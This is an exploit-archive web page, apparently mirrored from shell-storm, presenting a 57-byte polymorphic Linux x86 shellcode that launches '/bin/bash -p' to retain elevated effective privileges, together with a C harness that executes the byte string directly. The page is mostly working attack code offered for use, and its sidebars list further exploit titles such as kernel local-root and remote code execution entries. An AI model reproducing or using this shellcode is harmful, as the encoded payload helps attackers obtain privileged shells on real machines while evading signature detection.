首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux x86 - polymorphic execve("/bin/bash","-p",NULL) - 57 bytes
来源:http://www.shell-storm.org 作者:Salwan 发布时间:2010-05-06  

/*

Title:  Linux x86 - polymorphic execve("/bin/bash","-p",NULL) - 57 bytes
Author: Jonathan Salwan
Mail: submit@shell-storm.org
Web: http://www.shell-storm.org

!Database of Shellcodes http://www.shell-storm.org/shellcode/


sh sets (euid, egid) to (uid, gid) if -p not supplied and uid < 100
Read more: http://www.faqs.org/faqs/unix-faq/shell/bash/#ixzz0mzPmJC49

Based in http://www.shell-storm.org/shellcode/files/shellcode-606.php
*/

#include <stdio.h>

char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x21\x80"
     "\x6c\x0e\xff\x01\x80\xe9\x01\x75"
       "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
     "\x6b\x0c\x59\x9a\x53\x67\x69\x2e"
     "\x71\x8a\xe2\x53\x6b\x69\x69\x30"
     "\x63\x62\x74\x69\x30\x63\x6a\x6f"
     "\x8a\xe4\x53\x52\x54\x32\xca\xce"
     "\x81";

int main(int argc, char *argv[])
{
        fprintf(stdout,"Length: %d\n",strlen(shellcode));
 (*(void(*)()) shellcode)();      
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ziepod+ 1.0 Cross Application
·MDaemon Mailer Daemon Version
·OCS Inventory NG Server <= 1.3
·Wormable Remote Code Execution
·REZERVI 3.0.2 (root) Remote Co
·Safari 4.0.5 & Camino 2.0.2 hi
·BaoFeng Storm M3U File Process
·Firefox 3.6.3 & Safari 4.0.5 w
·Microsoft Paint Integer Overfl
·Avant Browser Denial of Servi
·AgentX++ Master AgentX::receiv
·JBoss Java Class DeploymentFil
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved